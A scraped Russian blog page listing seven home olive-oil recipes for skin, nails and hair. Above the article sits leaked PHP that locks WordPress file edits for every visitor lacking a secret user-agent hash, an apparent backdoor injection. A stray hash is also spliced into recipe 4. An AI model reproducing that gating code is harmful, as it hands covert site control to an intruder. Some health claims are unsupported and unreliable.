if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } 7 рецептов домашней косметики для ухода за кожей лица и тела с оливковым маслом | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

7 рецептов домашней косметики для ухода за кожей лица и тела с оливковым маслом

Оливковое масло используется для нанесения на кожу всего тела. Оно богато минералами и витаминами, благотворно влияющими на состояние кожи. Оно хорошо увлажняет и питает нижние слои кожи

С дав­них вре­мён олив­ко­вое мас­ло исполь­зу­ет­ся для нане­се­ния на кожу не толь­ко лица, но и все­го тела. Самым бога­тым соста­вом обла­да­ет мас­ло пер­во­го отжи­ма. Это горь­ко­ва­тое на вкус мас­ло про­дле­ва­ет жизнь кле­то­чек наше­го организма.

Олив­ко­вое мас­ло бога­то мине­ра­ла­ми и вита­ми­на­ми, бла­го­твор­но вли­я­ю­щи­ми на состо­я­ние кожи. Оно хоро­шо увлаж­ня­ет и пита­ет ниж­ние слои кожи, сво­бод­но про­хо­дя через эпи­дер­мис. При этом бла­го­твор­но вли­я­ет на сво­бод­ные ради­ка­лы. Пре­ду­пре­жда­ет преж­де­вре­мен­ное ста­ре­ние все­го орга­низ­ма. Поль­зу­ясь таким при­род­ным анти­ок­си­дан­том, кожа выгля­дит увлаж­нён­ной и сияющей.

Есть несколь­ко про­стых рецеп­тов, спо­соб­ных улуч­шить состо­я­ние волос, кожу лица, рук.

  1. На влаж­ную кожу после вод­ных про­це­дур хоро­шо нане­сти олив­ко­вое мас­ло и рас­те­реть. При­ят­ная и полез­ная про­це­ду­ра, кото­рая увлаж­нит и напи­та­ет кожу ваше­го тела. Дай­те мас­лу впи­тать­ся, выти­рать­ся при этом не надо.
  2. Ухо­жен­ная кожа на шее и обла­сти деколь­те укра­ше­ние любой жен­щи­ны. Вос­поль­зуй­тесь мас­кой, при­го­тов­лен­ной из неболь­шо­го коли­че­ства тво­ро­га, кури­но­го яйца и трёх ложек олив­ко­во­го мас­ла. Хоро­шо пере­ме­шан­ная мас­са выкла­ды­ва­ет­ся на кожу шеи деколь­те. Ста­рай­тесь рас­сла­бить­ся во вре­мя мас­ки, вклю­чи­те музы­ку. И про­ве­ди­те минут 25 в насла­жде­нии. Мас­ка лег­ко смы­ва­ет­ся тёп­лой водой.
  3. На про­блем­ные зоны, мож­но нане­сти олив­ко­вое мас­ло пред­ва­ри­тель­но кап­нув в него несколь­ко капель ман­да­ри­но­во­го эфир­но­го мас­ла. Мас­ка хоро­шо подей­ству­ет, если вти­рать её мас­саж­ны­ми дви­же­ни­я­ми. После непро­дол­жи­тель­но­го мас­са­жа мож­но поверх мас­ла поло­жить пище­вую плён­ку. Через 15 минут, сни­ми­те плён­ку и при­ми­те тёп­лый душ.
  4. 19a478b9d75f356bcac42c61a2fbf19cКра­си­вая кожа на руках может стать от дей­ствия ван­ноч­ки с тёп­лым олив­ко­вым мас­лом. В плос­кую посу­ди­ну налей­те тёп­лое олив­ко­вое мас­ло и опу­сти­те кисти рук на несколь­ко минут. По окон­ча­нии про­це­ду­ры обмок­ни­те руки бумаж­ной салфеткой.
  5. При­род­ный скраб мож­но сде­лать, поло­жив в неболь­шое коли­че­ство олив­ко­во­го мас­ла соль круп­но­го помо­ла. Помас­си­руй­те при­го­тов­лен­ным скра­бом всё тело, не забы­вая при этом лок­ти и ступ­ни. Кожа ста­нет мяг­кой, эла­стич­ной. Затем смой­те скраб тёп­лой водой.
  6. Ног­ти осо­бен­но лом­кие, сло­я­щи­е­ся, вызы­ва­ют бес­по­кой­ство. Что­бы они окреп­ли, сме­шай­те поло­ви­ну ста­ка­на олив­ко­во­го мас­ла с чай­ной лож­кой лимо­на. Мас­ло подо­грей­те на водя­ной бане, опу­сти­те паль­цы рук минут на 20, после чего про­мок­ни­те их сал­фет­кой. Дей­ствие ван­ноч­ки про­длит­ся, если надеть хлоп­ча­то­бу­маж­ные пер­чат­ки. Жела­тель­но такую про­це­ду­ру делать два раз в неде­лю, пока ног­ти окрепнут.
  7. Воло­сы  при­об­ре­тут здо­ро­вый блеск, если сде­лать раз в месяц мас­ку из трёх сто­ло­вых ложек олив­ко­во­го мас­ла и сто­ло­вой лож­ки лимон­но­го сока. При­го­тов­лен­ную смесь вотри­те в кор­ни волос и рас­чёс­кой рас­пре­де­ли­те по воло­сам. Уку­тай­те цел­ло­фа­ном и поло­тен­цем на 30 минут. Затем слег­ка про­мыть шампунем.

Как види­те, олив­ко­вое мас­ло заме­ча­тель­ная нату­раль­ная кос­ме­ти­ка.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!